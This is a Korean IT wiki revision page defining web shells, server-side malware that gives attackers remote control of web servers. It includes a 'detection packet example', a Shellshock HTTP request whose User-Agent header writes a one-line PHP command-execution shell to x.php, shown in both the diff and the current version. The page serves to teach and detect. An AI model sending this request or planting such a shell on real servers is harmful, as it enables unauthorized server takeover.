웹셸: 두 판 사이의 차이
IT위키
(새 문서: Web Shell; 웹페이지에서 서버에 명령어를 실행하기 위해 만들어진 프로그램 * 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다. * 웹...) |
편집 요약 없음 |
||
(사용자 3명의 중간 판 3개는 보이지 않습니다) | |||
1번째 줄: | 1번째 줄: | ||
Web Shell; | [[분류:보안]][[분류:보안 공격]] | ||
;Web Shell | |||
; 해커가 원격에서 웹서버를 조종할 수 있도록 제작한 웹서버용 악성코드 | |||
* 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다. | * 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다. | ||
* | * 웹서버가 가지고 있는 취약점을 악용해 웹쉘을 업로드시켜 웹서버를 해킹하는데 이용하거나, 해킹한 웹서버를 관리하기 위한 목적으로 설치하기도 함 | ||
== 탐지 패킷 예제 == | |||
<pre> | |||
GET /cgi-bin/bash_vul.cgi HTTP/1.1 | |||
Accept: text/html, application/xhtml+xml, */* | |||
Accept-Language: ko-KR | |||
User-Agent: ( ){ :; }; echo "<?\$cmd=\$_REQUEST[\"cmd\"]; if(\$cmd !=\"\"){print shell_exec(\$cmd);}?>" >../html/x.php | |||
Accept-Encoding: gzip, deflate | |||
</pre> |
2019년 6월 14일 (금) 23:12 기준 최신판
- Web Shell
- 해커가 원격에서 웹서버를 조종할 수 있도록 제작한 웹서버용 악성코드
- 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다.
- 웹서버가 가지고 있는 취약점을 악용해 웹쉘을 업로드시켜 웹서버를 해킹하는데 이용하거나, 해킹한 웹서버를 관리하기 위한 목적으로 설치하기도 함
탐지 패킷 예제[편집 | 원본 편집]
GET /cgi-bin/bash_vul.cgi HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: ( ){ :; }; echo "<?\$cmd=\$_REQUEST[\"cmd\"]; if(\$cmd !=\"\"){print shell_exec(\$cmd);}?>" >../html/x.php Accept-Encoding: gzip, deflate